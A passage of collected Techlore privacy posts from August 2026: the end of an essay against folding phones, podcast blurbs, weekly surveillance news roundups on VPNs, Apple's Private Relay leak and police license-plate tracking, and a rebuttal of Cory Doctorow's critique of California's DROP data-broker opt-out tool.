a $2,000 folding phone, and that a decade later most new development in phone tech would revolve around that price? Subconsciously, these price points normalize even the starting price for the new iPhone 17 Pro ($1099). - **Normalizing Fragility.** What happened to my friends & family complaining to me about planned obsolescence in the 2010s when their iPhone screen would break from a drop in the grass? It's like everyone's skepticism radars were fine-tuned then. Now, these phone companies are using the 'coolness' of folding to override people's expectations for a phone *built to last*. Remember: These things will *not* handle an unfortunate trip to the beach, nor a *fingernail* on the inner screen. Meanwhile Apple made the iPhone 17 Pro tougher and thicker, so they know what a phone built to last looks like, and it isn't the one that folds. Because of these consequences, I don't see folding phones as 'just another piece of technology'. I see them as the death of budget phones, small phones, and eventually durable phones. And I fear if we keep enabling it, we may end up with the least functional smartphones we've ever had. ### Final Thoughts I recently posted my take about this on [Mastodon](https://social.lol/@hen/117179067662304034) and I accidentally rage-baited one of my good friends who daily-drives a folding phone. So he messaged me on Signal passionately defending it. He finds it useful as a phone + iPad Mini replacement, especially since he bought his used for $400\. I really don't think that's the problem, the problem is the person handing a company $2000 for an inferior product that doesn't enable function for an active person. For a device that's fragile. For a device that isn't repairable. At a time when people are struggling all around the world. When buying a home feels impossible for millions. When gas prices are on the mind. When grocery bills go up every week. When memory prices are high and people are struggling to afford tech. The people laughing all the way to the bank are the tech companies rolling out multi-thousand-dollar Vision Pros and multi-thousand-dollar folding phones for the few who are able to afford them. All while misdirecting attention away from the truly budget experiences that used to be valued and loved by many. Cheap, durable, repairable phones didn't fail in the market. They were abandoned because the margins were better somewhere else. And until we vote with our wallets, I fear this ultra-premium trend will only worsen as the years go on. ### Border Crossings, Burner Phones, and Surviving Interrogation in China with Josh Summers from All Things Secured URL: https://techlore.tech/border-crossings-burner-phones-and-surviving-interrogation-in-china-with-josh-summers-from-all-things-secured/ Last updated: 2026-08-29T16:00:58.000Z [Border Crossings, Burner Phones, and Surviving Interrogation with Josh Summers from All Things Secured | Techlore TalksJosh Summers spent a decade living in western China before 14 police officers showed up at his door, accused him of espionage, and confiscated every device his family owned. This Techlore Talks interview covers what 17 days of interrogation taught him about digital privacy while traveling, and…![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/icon/favicon-636b619b27c8932b15adac78178e70ebdf1f2c3a33de896176872b88cb3a5e48-289b73bb-9c49-4669-9d1a-d7f4d54dae07.ico)Border Crossings, Burner Phones, and Surviving Interrogation with Josh Summers from All Things Secured![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/MzdjYi5qcGc-fae46a4b-13f9-4ca7-96d6-be3737659c5a.jpg)](https://share.transistor.fm/s/4fda4de9) Josh Summers spent a decade living in western China before 14 police officers showed up at his door, accused him of espionage, and confiscated every device his family owned. This Techlore Talks interview covers what 17 days of interrogation taught him about digital privacy while traveling, and the practical steps that could make the difference for you. 🔐 Listen to the podcast on [Apple Podcasts](https://podcasts.apple.com/us/podcast/techlore-talks/id1652151010), [Spotify](https://open.spotify.com/show/1qjWVCYgRcZFL9c8FsLLo0), other [podcast apps](https://pod.link/1652151010), or [RSS](https://feeds.transistor.fm/techlore-talks). You can also watch Techlore Talks on [YouTube](https://youtube.com/playlist?list=PL3KeV6Ui%5F4CZRb5Z4qZjsIGZrUWbDc3Mn) or [Techlore.TV](https://techlore.tv/w/p/iZqf9xe1fE7Ss4pebDKd42) ## Episode Sources • All Things Secured (website): • All Things Secured (YouTube): • All Things Secured (Odysee): [https://odysee.com/@AllThingsSecured](https://odysee.com/@allthingssecured) ### Apple Fixed A Leak Without Telling Anyone, Plus More VPN News and Flock's Creepy Police AI URL: https://techlore.tech/apple-fixed-a-leak-without-telling-anyone-plus-more-vpn-news-and-flocks-creepy-police-ai/ Last updated: 2026-08-29T01:37:09.000Z 📰 Listen to the weekly podcast on [Apple Podcasts](https://podcasts.apple.com/us/podcast/techlore-surveillance-report/id1507714387), [Spotify](https://open.spotify.com/show/5rxm041iDXxe0rINwO5G0c), other [podcast apps](https://pod.link/1507714387), or [RSS](https://feeds.transistor.fm/techlore-surveillance-report). You can also watch Surveillance Report on [YouTube](https://youtube.com/playlist?list=PL3KeV6Ui%5F4CZemCIsHUIuEtugAmUxAYHS) or [Techlore.TV](https://techlore.tv/w/p/twkcDETcDauUXuaGNJnhZG) [Click For All Sources](#action-item-✅) --- ## On My Radar 🎯 **Four VPN Updates Landed This Week...With No Catches!** If you've been following Techlore for a while, you know that a week with not just one positive VPN story, but *four* is quite extraordinary! Here's what's changed: 1. **Mullvad shipped multihop modes.** Multihop is their feature that routes you through two servers before you reach a site. What's new is *how* you turn it on. Alongside "always" and "never," there's now a "when needed" mode that automatically routes through a nearby compatible entry server and exits through your chosen location. While I don't personally use multihop, this is a genuine usability upgrade for those of you looking to maximize your Mullvad privacy. 2. **Obscura VPN launches on Windows.** Obscura is a VPN relay which distributes trust across themselves and Mullvad VPN, so neither party sees the whole picture, similar to Apple's Private Relay model. They started Apple-only, added Android, and now Windows, with the device cap raised to five to match. I've interviewed [Carl from Obscura](https://techlore.tech/its-time-for-the-vpn-industry-to-innovate-obscura-interview/) if you want to learn more about this open source project. *(And they're offering 25% off as part of this launch!)* 3. **Apple Quietly Patches Their Leak.** Speaking of Private Relay: Apple quietly patched the DNS leak that the Mysk team [recently disclosed](https://techlore.tech/apples-private-relay-is-leaking-your-ip-plus-fake-vpn-extensions-frances-big-win/). Apple fixed it with no mention in the security release notes. I think the choice to sweep this under the rug is a mistake; when people's safety depends on these tools, silently patching does *not* rebuild confidence that the tools are safe to use. 4. **Firefox brings its free VPN to Android, with iOS to follow.** Fifty gigabytes, free, in the browser. If you're already running a dedicated VPN, this isn't aimed at you. It's aimed at the friends and family who now get basic IP protection without a subscription conversation. I interviewed a [Firefox team member ](https://techlore.tech/firefox-vpn-explained-50gb-free-no-logging-and-how-it-compares-to-mozilla-vpn/)about this free VPN earlier this year if you'd like to learn more about the service. **What you can do:** Check whether you are still affected by the Private Relay leak at [leaks.psylo.app](https://leaks.psylo.app/), some third party browser may still be impacted. If you've got family on Firefox, tell them the VPN is there, it's a low-friction privacy win available to non-technical people! --- ## Bits & Bytes 🤖 **\~ Story 1: Flock's New AI Gives Police a Search Engine for Your Movements** Wired obtained the code behind Flock's new AI tool for law enforcement. This tool identifies drivers and tracks vehicles by movement patterns alone, turns plates into names, home addresses, and relatives, and can search everyone inside an area you draw on a map. **My take:** What Flock has built is the equivalent of someone following you through public and private space for weeks, stored with a private company you never opted into using, and that data is automatically piped to police. That's a Fourth Amendment problem, and it's an egregious invasion of privacy. In fact, the Flock CEO [directly said](https://www.yahoo.com/news/us/articles/flock-camera-ceo-asks-americans-132811636.html) he feels Americans should 'compromise' on their privacy. I'm sure he'd love that 🙄 **\~ Story 2: Meta Settles for $16-18 Billion Over Harms to Kids** Meta reached a settlement with US states over social media harms to children. Separately, New Zealand introduced a bill requiring Instagram, TikTok, Snapchat, and Facebook to verify users are over 16. **My take:** The 16-18 billion is certainly a win, but the EFF is more critical than I am and they're right to be: the settlement embeds age assurance into every product, mandating more data collection from users of *all* ages, and the data-minimization terms don't stop states from using what's collected for other law enforcement purposes. Separately, New Zealand is chasing a policy Australia already ran, where teenagers bypassed it, more ID got uploaded, kids ended up less private, and the platforms themselves changed nothing. **\~ Story 3: X Forces Nitter and XCancel Offline** X Corp (Formerly known as Twitter) sent cease-and-desist letters on August 24 demanding permanent takedown of Nitter instances and the project's repo. Nitter.net is down and the maintainer is seeking legal advice. *(Nitter & XCancel are private frontends to be able to access X content.)* **My take:** This hostile behavior towards frontends is problematic, but isn't unique to X: Reddit, Facebook, YouTube and Instagram all try to attack frontends, because accounts are where the **ads** and the **control** are. I believe if you publish anything and have any kind of following, you owe your audience an off-ramp from these platforms to make frontends not necessary for your audience. That's the entire reason we self-host [techlore.tv](https://techlore.tv), why we're on Bluesky & Mastodon, and why we publish our content here on Ghost in a publicly-accessible manner. --- ## This Week on Techlore 📺 ![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/2026/08/image-10.png) We've been hard at work on Go Incognito v2, with the first lessons completed and our new site going out to beta testers any day now. While I'm intentionally avoiding launch dates, I feel confident in saying it'll be ready soon, with preorders right around the corner 😄 --- ## Action Item ✅ The VPN world has shifted the last several weeks, so I'd suggest re-exploring your VPN workflow. Obscura is a new option if you were holding out on Windows, Private Relay may have lost your trust and a [systemwide VPN](https://tools.techlore.tech/#vpn-providers) is a new consideration, and all iOS users should run this [test to find leaks. ](https://leaks.psylo.app/) **Until next week 🫡** #### This Week's Sources ****Highlight** - - - - - ****Story 1: Flock's new AI gives police a search engine for your movements** - - ****Story 2: Meta pays $16.68 billion over kids' social media harms** - - - ****Story 3: Open-source X viewers Nitter & XCancel forced offline** - ****The Defense Bulletin** **Data Breaches* - - - **Threats* - - - - - - - - **FOSS+ Updates* - - - - - - - - ### Apple's Private Relay Is Leaking Your IP, Plus Fake VPN Extensions & France's Big Win URL: https://techlore.tech/apples-private-relay-is-leaking-your-ip-plus-fake-vpn-extensions-frances-big-win/ Last updated: 2026-08-21T00:57:33.000Z 📰 Listen to the weekly podcast on [Apple Podcasts](https://podcasts.apple.com/us/podcast/techlore-surveillance-report/id1507714387), [Spotify](https://open.spotify.com/show/5rxm041iDXxe0rINwO5G0c), other [podcast apps](https://pod.link/1507714387), or [RSS](https://feeds.transistor.fm/techlore-surveillance-report). You can also watch Surveillance Report on [YouTube](https://youtube.com/playlist?list=PL3KeV6Ui%5F4CZemCIsHUIuEtugAmUxAYHS) or [Techlore.TV](https://techlore.tv/w/p/twkcDETcDauUXuaGNJnhZG) [Click For All Sources](#action-item-✅) --- ## On My Radar 🎯 **Three cracks opened in Apple's privacy story this week** 1. Apple tells you that its Private Relay feature hides your IP address and your Safari browsing from network providers and websites. This is one of those situations where *technical privacy* doesn't always align with *practical privacy;* I'm a fan of the *tech* behind Private Relay because it distributes trust across more than one party and [even inspired more powerful VPNs like Obscura](https://techlore.tech/its-time-for-the-vpn-industry-to-innovate-obscura-interview/). But why does this matter when it turns out DNS prefetching was leaking your queries outside the Relay, as well as the WebTransport protocol, and the passkey system? Yep, the Mysk security team discovered these issues and they still aren't patched, meaning all of the situations I listed earlier can leak your IP even with Private Relay enabled. 2. Separately, the founders of EasyOptOuts found that Hide My Email was surfacing customers' real email addresses in bounce logs, all discovered accidentally while debugging why emails weren't arriving. They reported it to Apple, got nothing for months, then went to the press. It was patched a week later, on July 7th. 3. The third 'issue' to flag is Apple recently sent a wave of notifications to individuals targeted by state-sponsored spyware. If you received one of these notifications, check the sources down below for assistance. Apple continues to reassure users that Lockdown mode hasn't been bypassed, so it's something I'd encourage any security-conscious Apple user to implement. Regarding the Private Relay issue, what bothers me most is even a *properly functioning* Private Relay only ever covered Safari. Why isn't it system-wide? And why, in 2026, can no VPN on iOS: Mullvad, Obscura, IVPN, Windscribe, Proton, any of them—[*guarantee* that 100% of your traffic actually goes through the tunnel](https://mullvad.net/en/blog/force-all-app-traffic-into-the-tunnel) because of Apple's random exclusions? I wish I knew why Apple didn't treat IP-based protection seriously after years of researchers raising these concerns. **What you can do:** Hide My Email is fixed, but I'd still move to a dedicated aliasing service that gives you ownership, open source code, and isn't pinned to the Apple ecosystem. [SimpleLogin and Addy.io are two great tools](https://tools.techlore.tech/#aliasing-services) for this. And if Safari hiding your IP matters to you, **turn it off** and consider a [dedicated VPN ](https://vpn.techlore.tech/)in the meantime. Finally, don't forget to enable lockdown mode if you're concerned about nation-state threats. --- ## Bits & Bytes 🤖 **\~ Story 1: Big tech browsers are getting less private** 737 extensions impersonating ProtonVPN, NordVPN, Surfshark, ExpressVPN and Cloudflare's 1.1.1.1 were published to the **official** Chrome Web Store, routing traffic through a proxy. Google has pulled \~200, with over 500 still live at the time the article was written. Separately, AdGuard confirmed Edge is now phasing out Manifest V2, following Chrome. **My take:** Big tech's whole pitch is that their app stores are safe *because* they vet things. Then 500 impersonations sit there after the campaign was identified...*sigh*... I almost never install extensions, but when I do, I go to the developer's own website and use their download link. I recommend you *always* download software using official links from a verified source in this manner. As for MV2, Firefox has committed to support it indefinitely, Brave still ships an MV2 section in settings, and Vivaldi and the Firefox forks are fine too. Pretty much, if you're on a browser not run by a big tech company, you still get access to quality ad-blocking. I'll let you all decide if you think that's a coincidence and [choose your browser](https://tools.techlore.tech/#browsers) accordingly 😄 **\~ Story 2: Judge gives Google one week to fix its Play Store** [I covered recently](https://techlore.tech/signals-biggest-update-in-years-plus-rival-app-stores-arrive-in-the-play-store/) how following the Epic case, Google agreed to allow third-party app stores inside the Play Store, but the court found searching for Aptoide didn't return it properly, and the store page had a "View" button instead of "Install." The judge ordered both fixed within a week and Google's legal team agreed. **My take:** Winning the battle, losing the war. Yes, it's good. But Google is simultaneously making actual "sideloading" harder. Developer settings, a reboot, a 24-hour wait, a confirmation that you really meant it, all while *charging money* for third-party stores to get into the Play Store. What happens to people on custom ROMs who don't want the Play Store at all? That's the part nobody's targeting and can genuinely harm the Android ecosystem. **\~ Story 3: France's top court blocks the under-15 social media ban** A French top court found that the under-15 social media ban disproportionately infringed on freedom of expression and communication and failed to provide the safeguards needed to protect private life. Macron has asked his government to rewrite it. **My take:** This is a **huge win** but I don't want to oversell it. This isn't over in France, and the EU is still signaling it wants stronger protections for children from harmful social media features. To be clear: I want to see social media a healthier place for children, but I don't think *banning kids* is accomplishing that. Kids get around these bans, or their parents wave them through, or they wait until 16 and join the exact same exploitative platform, and nothing about the platform itself actually changed. Meanwhile, the only way to check anyone's age is to have everyone upload ID—to the very companies that keep getting breached! That's the *individual* being regulated instead of the *company,* all while making everyone less safe. So yes, amazing decision by this court in France, but I'm still hoping we see more activity that targets the *companies* responsible for this. --- ## This Week on Techlore 📺 Very busy week, so I'm excited to share some great things we worked on to make your digital rights journey a bit smoother 🙌 First, we launched *v2026.08* of our tools with new VPN pages, a smarter privacy quiz, and a much faster site to make them even stronger tools to use yourself or share with loved ones: [Techlore v2026.08: 100+ New VPN Pages, a Smarter Quiz, and a Faster SiteThis update brings 100+ new VPN pages you can browse without JavaScript, a smarter Quiz that stops recommending tools you already use, three new privacy tools, and a noticeably faster site across the board. Plus: a heads up on why v2026.09 might be late.![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/icon/tl-ee9916b1-2372-4dcc-b172-a82af076c808.png)TechloreHenry Fisher![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/Screenshot-2026-08-14-at-18.51.48-7fcde235-a7a1-4e54-93e4-32e1cf5b0f0c.png)](https://techlore.tech/techlore-v2026-08-100-new-vpn-pages-a-smarter-quiz-and-a-faster-site/) I had the privilege of speaking to the executive director of CalPrivacy to discuss California's DROP system, which opts people out of people-searching sites *for free,* and this interview reveals everything you need to know about the program and how it works: [Cory Doctorow’s Right About Data Brokers. He’s Wrong About DROP. Here’s Everything You Need to Know About California’s Opt-Out Tool.Cory Doctorow says California’s DROP tool is “privacy theater.” I was skeptical too, so I asked the executive director behind DROP. Welcome to my deep-dive on how DROP works and why I decided to start using it.![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/icon/tl-f63623ef-3dda-4152-859c-be9e962e2c52.png)TechloreHenry Fisher![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/maxresdefault-d31321b1-841d-4f11-8ffc-aabe8f53756e.jpg)](https://techlore.tech/cory-doctorows-right-about-data-brokers-hes-wrong-about-drop/) A recent tool went semi-viral called DecryptAds, so I wanted to share how it performs and shared other powerful ways you can analyze whether or not websites around the internet are spying on you: [How To Check What Any Website Is Doing With Your DataYou can look up exactly which companies are getting your data from any website for free, in about a minute. But the tool everyone’s sharing right now has a blind spot big enough that Facebook comes back completely clean. Here are three tools that actually show you what a![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/icon/tl-cabfcfa9-a415-46dd-aaf8-35716cabc15a.png)TechloreHenry Fisher![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/yourdoctor.com--3--e0d91afe-b5a7-4806-aeff-4bafed31d23f.png)](https://techlore.tech/how-to-check-what-any-website-is-doing-with-your-data/) Comcast released a new feature where they identify people using your home router. This was a creepy one and I had some advice to keep everyone's home network a bit safer: [Your ISP Is Watching You Walk Around Your HouseComcast just turned millions of leased Xfinity routers into motion sensors that track movement through your home, and buried in the fine print is a clause letting them hand that data to third parties without telling you. Here’s what Xfinity Shield actually does, why the tradeoff makes no sense![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/icon/tl-25c756df-36ff-4ff1-aff5-80da73ff40d9.png)TechloreHenry Fisher![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/Horror-Sonar-Ghost-Poster--3--6e0b5bce-ec2c-40bd-b198-2c683856e29b.png)](https://techlore.tech/your-isp-is-watching-you-walk-around-your-house/) And finally, I spoke with a member of DeFlock regarding the anti-ALPR movement and how anyone reading can get involved: [Flock No: The Open Source Project Mapping Every Surveillance Camera in America (DeFlock Interview)Techlore Talks brings you in-depth conversations with the experts at the forefront of digital rights, privacy and security.![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/icon/tl-544e4849-e70b-4ca3-98a7-eda87490a968.png)TechloreTori![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/20260822-BOB-DEFLOCK-INTERVIEW-thumbnail-v1-0e797244-bc1a-4a17-a185-8aa28baea054.jpg)](https://techlore.tech/flock-no-the-open-source-project-mapping-every-surveillance-camera-in-america-deflock-interview/) --- ## Action Item ✅ Two minutes on whatever Apple hardware you have. *Settings → iCloud → Private Relay*, and decide to live with its limitations, or replace it with a [full VPN](https://vpn.techlore.tech/). **Until next week 🫡** #### This Week's Sources ****Highlight:** - - - - ****Story 1: Your browser is quietly getting less private** - - ****Story 2: Judge gives Google one week to fix "anticompetitive" Play Store** - ****Story 3: France's top court blocks social media ban for under-15s** - ****The Defense Bulletin** **Data Breaches* - - - - - - - - - - - **Threats* - - - - - - - **FOSS+ Updates* - - - - - - - - - - - - - ### Flock No: The Open Source Project Mapping Every Surveillance Camera in America (DeFlock Interview) URL: https://techlore.tech/flock-no-the-open-source-project-mapping-every-surveillance-camera-in-america-deflock-interview/ Last updated: 2026-08-27T20:41:06.000Z [Flock No: The Open Source Project Mapping Every Surveillance Camera in America (DeFlock Interview) | Techlore Talks | Episode 79Flock Safety is one of several companies quietly building a searchable database of everyone’s car — no warrant required, and no way to opt out. In this Techlore Talks interview, Bob from DeFlock breaks down how ALPR technology works, what “end-to-end encryption” really means in Flock’s case, why…![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/icon/favicon-636b619b27c8932b15adac78178e70ebdf1f2c3a33de896176872b88cb3a5e48-e32224c3-4295-4364-afef-f43bed1bd1d8.ico)Flock No: The Open Source Project Mapping Every Surveillance Camera in America (DeFlock Interview)![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/thumbnail/MzdjYi5qcGc-22b6a348-f197-412d-95fc-6333ff5a2561.webp)](https://share.transistor.fm/s/6ba4ccac) Flock Safety is one of several companies quietly building a searchable database of everyone's car — no warrant required, and no way to opt out. In this Techlore Talks interview, Bob from DeFlock breaks down how ALPR technology works, what "end-to-end encryption" really means in Flock's case, why this issue is bipartisan, and what you can do about it in your own city. 🔐 Listen to the podcast on [Apple Podcasts](https://podcasts.apple.com/us/podcast/techlore-talks/id1652151010), [Spotify](https://open.spotify.com/show/1qjWVCYgRcZFL9c8FsLLo0), other [podcast apps](https://pod.link/1652151010), or [RSS](https://feeds.transistor.fm/techlore-talks). You can also watch Techlore Talks on [YouTube](https://youtube.com/playlist?list=PL3KeV6Ui%5F4CZRb5Z4qZjsIGZrUWbDc3Mn) or [Techlore.TV](https://techlore.tv/w/p/iZqf9xe1fE7Ss4pebDKd42) ## Episode Sources • DeFlock: • No ALPRs Week of Action: ### Your ISP Is Watching You Walk Around Your House URL: https://techlore.tech/your-isp-is-watching-you-walk-around-your-house/ Last updated: 2026-08-20T05:22:25.000Z Comcast just turned millions of leased Xfinity routers into motion sensors that track movement through your home, and buried in the fine print is a clause letting them hand that data to third parties without telling you. Here's what Xfinity Shield actually does, why the tradeoff makes no sense even if you want the feature, and how to get off your ISP's hardware with a modem and router you actually own. [**Watch on Techlore.TV for an ad-free, surveillance-free viewing experience**](https://techlore.tv) ### How To Check What Any Website Is Doing With Your Data URL: https://techlore.tech/how-to-check-what-any-website-is-doing-with-your-data/ Last updated: 2026-08-18T21:56:58.000Z You can look up exactly which companies are getting your data from any website for free, in about a minute. But the tool everyone's sharing right now has a blind spot big enough that Facebook comes back completely clean. Here are three tools that actually show you what a site is doing, tested on a real healthcare provider. [**Watch on Techlore.TV for an ad-free, surveillance-free viewing experience**](https://techlore.tv) ### Cory Doctorow's Right About Data Brokers. He's Wrong About DROP. Here's Everything You Need to Know About California's Opt-Out Tool. URL: https://techlore.tech/cory-doctorows-right-about-data-brokers-hes-wrong-about-drop/ Last updated: 2026-08-16T06:00:12.000Z I don't say this lightly: Cory Doctorow has shaped how I think about surveillance capitalism more than almost anyone else writing today. His books have directly influenced my relationship with privacy, digital rights, and the future of the open internet, and I know they have for lots of our audience members too! So when I tell you I disagree on his [recent piece](https://pluralistic.net/2026/07/23/drop-a-dime/#privacy-theater) on California's DROP tool where he calls it an *'obstacle course'* with the slug of the article being *'privacy theater'*, it's because I wanted to share my difference in views in the most respectful possible way. But I'm still bowing down to the legend 🙇 ![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/2026/08/image-7.png) My name is Henry Fisher and I run [Techlore](https://techlore.tech/). We produce resources to make privacy & security easy for just about anyone. And if you haven't heard, [DROP](https://privacy.ca.gov/drop/) is a data broker removal tool for California residents, a first-of-its-kind government-run tool. And while I think skepticism is warranted, I think DROP's reality isn't at all what Doctorow implies. ## The Data Broker Industry & DROP ![a black and white photo of a sign that says privacy please](https://images.unsplash.com/photo-1595666944516-bbb485958fb5?crop=entropy&cs=tinysrgb&fit=max&fm=jpg&ixid=M3wxMTc3M3wwfDF8c2VhcmNofDR8fHByaXZhY3l8ZW58MHx8fHwxNzg2ODUxMzk3fDA&ixlib=rb-4.1.0&q=80&w=2000) Photo by [Jason Dent](https://unsplash.com/@jdent) / [Unsplash](https://unsplash.com/?utm%5Fsource=ghost&utm%5Fmedium=referral&utm%5Fcampaign=api-credit) I've been skeptical of DROP for months, and actively put off doing it myself. I'm not the kind of person to upload my personal information to a brand new tool. Additionally, the premise that you have to **opt out** of a system that never should've existed has rubbed me the wrong way from the start. Doctorow's underlying diagnosis is one I hold too: **data brokers are a real harm**—a direct pipeline to stalking, doxxing, killing, deepfake material, and more. ![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/2026/08/image-8.png) And because of my skepticism, a couple weeks before Doctorow's blog, I interviewed the executive director of the [California Privacy Protection Agency](https://privacy.ca.gov/about-us/), Tom Kemp, the agency that built and runs DROP. I was able to ask about its privacy and security, the 'why' behind DROP, why they can't just ban data brokers outright, and a lot more that changed my views towards the service. You can watch the full hour-long interview [here](https://youtu.be/1t3sueQMNQE). ## Getting the Details Right ![magnifying glass near gray laptop computer](https://images.unsplash.com/photo-1516382799247-87df95d790b7?crop=entropy&cs=tinysrgb&fit=max&fm=jpg&ixid=M3wxMTc3M3wwfDF8c2VhcmNofDF8fGZhY3QlMjBjaGVja3xlbnwwfHx8fDE3ODY4NTE1ODh8MA&ixlib=rb-4.1.0&q=80&w=2000) Photo by [Agence Olloweb](https://unsplash.com/@olloweb) / [Unsplash](https://unsplash.com/?utm%5Fsource=ghost&utm%5Fmedium=referral&utm%5Fcampaign=api-credit) Many of my subscribers asked for my opinion on Doctorow's piece, so while this certainly serves them, I also think it serves as an educational piece for *anyone.* My assumption is Doctorow's reservations are shared among many, so I hope I can add some clarity around DROP. Okay, let's dive in. **Doctorow Claim 1:** > Banning data brokers would make great sense, which is why Biden's CFPB banned data brokers (only to have Trump un-ban them) **Why it's not accurate:** In December 2024, the [CFPB proposed a rule ](https://www.consumerfinance.gov/about-us/newsroom/cfpb-proposes-rule-to-stop-data-brokers-from-selling-sensitive-personal-data-to-scammers-stalkers-and-spies/)that would have [expanded](https://www.consumerfinancialserviceslawmonitor.com/2024/12/the-cfpb-proposes-new-fcra-rule-to-dramatically-expand-its-scope-though-finalization-is-unlikely/) the Fair Credit Reporting Act to treat data brokers as consumer reporting agencies. [That proposal ](https://www.federalregister.gov/documents/2025/05/15/2025-08644/protecting-americans-from-harmful-data-broker-practices-regulation-v-withdrawal-of-proposed-rule)was **never finalized** and **never took effect**. Data brokers operated, legally, the entire time it was pending. In May 2025, the CFPB [withdrew](https://epic.org/epic-condemns-cfpbs-withdrawal-of-proposed-rules-to-rein-in-data-brokers/) the proposal. This is an important detail to drill down since it tells readers a functioning ban existed and got reversed, when data brokers never stopped operating. **Trust me, if we banned data brokers, I'd personally hold a party to celebrate it** 🥳 **Doctorow Claim 2:** > To start the DROP process, you are recommended to create a Login.gov ID. This is an incredibly invasive process that involves photographing multiple pieces of ID and taking several selfies using special apps and webpages that hijack your device's camera and processor in a bid to prevent bad actors from spoofing the process. \[....\] After you log in to DROP via Login.gov, you are sent a text message – to the phone number in your Login.gov profile – with a link to access a "secure" website that takes over your camera to let you take a "secure" photo of the front and back of your California driver's license or your US passport. But as Tom Kemp shared, this isn't the reality for many people: > **Tom Kemp, CalPrivacy Executive Director:** It either uses your personal information to do quick lookups with state records...or it uses your login.gov federal account. Most people use the first option for residency verification, which is put some basic personal information... boom, you're a resident. ![](https://storage.ghost.io/c/a2/66/a26623cd-de8a-40f5-bb97-cc1265613cf7/content/images/2026/08/image-6.png) DROP offers both options, and it even suggests the less invasive check first. Sadly, I wasn't able to use the less invasive check, which is a common issue I stumble on when verifying my private mailing addresses. But I would expect many **family & friends** to successfully use the simpler system. This flow away from login.gov only requests: Name, Date of Birth, Address, and an email for a code *(which accepted an alias email in my testing)* With that said, if you do have to use login.gov—**it sucks!** **Doctorow Claim 3:** > You also have to provide your mobile advertising identifier, a long, unique number that you may or may not be able to extract from your phone, depending on the model and the OS version. If you can't get it that way, you can install an app like AAID, which comes with a long list of – you guessed it – permissions to extract, store and process your private information. This is completely optional and is not mandatory: > **Tom Kemp, CalPrivacy Executive Director:** You put your name or variations of your name, you put your date of birth, and you put your zip code. Now, you can stop there...Or we ask for three bits of additional information. Mobile advertising ID... a connected TV ID, or your VIN... you can control how much information you want. The base DROP submission is quite minimal. The mobile ad ID, connected TV ID, and VIN are a further *optional* tier on top of that. And why are mobile IDs and TV IDs hard to get? **Because the mobile & TV ecosystems make it that way!** I don't see how this is a fault of the tool trying to actively remove that invasive data. **Doctorow Claim 4:** > Here's the thing: the whole point of a mobile ad identifier is that apps can access it (this is how they identify and track you). That step, where the system made you switch to your phone and use your camera to photograph your driver's license? That step could have automatically pulled this data off your device. That's the whole fucking point of this exercise: that web-pages and apps can request your mobile ad identifier. So Login.gov, a government website that isn't required to use DROP, wasn't collecting advertising IDs and passing it to DROP? I want to be very clear: **That's a** **good thing.** But more importantly, Doctorow's claim isn't feasible. Mobile ad identifiers ([IDFA on iOS](https://developer.apple.com/documentation/apptrackingtransparency), [GAID/AAID](https://developer.android.com/training/articles/ad-id) on Android) are *native-app-level* identifiers, [not *web-accessible* ones](https://developer.apple.com/documentation/adsupport/asidentifiermanager). And DROP's login.gov flow sends a link to your phone that opens in your browser. Put simply: these can't be called from a webpage loaded in a browser. **Doctorow Claim 5:** > This is either a system with no coherent threat model, or (far more probably), its threat model is that people will use it. This is California's answer to "a locked filing cabinet stuck in a disused lavatory with a sign on the door saying 'Beware of the Leopard' I fully agree the system can be more streamlined. But on the other side of the coin: > **Tom Kemp, CalPrivacy Executive Director:** We've had 375,000 people sign up, which is pretty incredible in that deletions haven't begun... The satisfaction ratings that we get are very high. They're in the 4.X range on a scale of 5, which is really good for consumer-facing products... we have people that are in their 80s and 90s using this system. And regarding threat modeling & safety: > **Tom Kemp, CalPrivacy Executive Director:** That data is stored in kind of five separate areas and it's hashed... Only if there is a match, then they know who that individual is, and they're required to then delete all the information... I don't even know if you signed up because the data has been hashed and the data brokers can't supplement their databases. Everything you choose to submit gets immediately hashed into separate identifier buckets. A broker can only get a match if they already independently possess your matching hashed data on their end.For non-technical folks: this means neither party is communicating using your *raw* data. It's a nice privacy advantage over the traditional system. > **Tom Kemp, CalPrivacy Executive Director:** brokers are required to then delete all the information, even if it just matches against an email address. This is my favorite hidden detail about DROP: Even if you never submit a VIN or mobile ad ID, if a broker happens to have your name and that VIN linked together in their own file, the match on your name alone is enough to force them to delete the whole record. ## Why not just ban them outright? ![a red street sign sitting on the side of a road](https://images.unsplash.com/photo-1695939916110-3e8f44ee3441?crop=entropy&cs=tinysrgb&fit=max&fm=jpg&ixid=M3wxMTc3M3wwfDF8c2VhcmNofDF8fGJhbm5lZHxlbnwwfHx8fDE3ODY4NTE1NTl8MA&ixlib=rb-4.1.0&q=80&w=2000) Photo by [Othman Alghanmi](https://unsplash.com/@theemanofoth) / [Unsplash](https://unsplash.com/?utm%5Fsource=ghost&utm%5Fmedium=referral&utm%5Fcampaign=api-credit) This is the question underneath Doctorow's whole piece. Like Doctorow, I am in *full support* of a 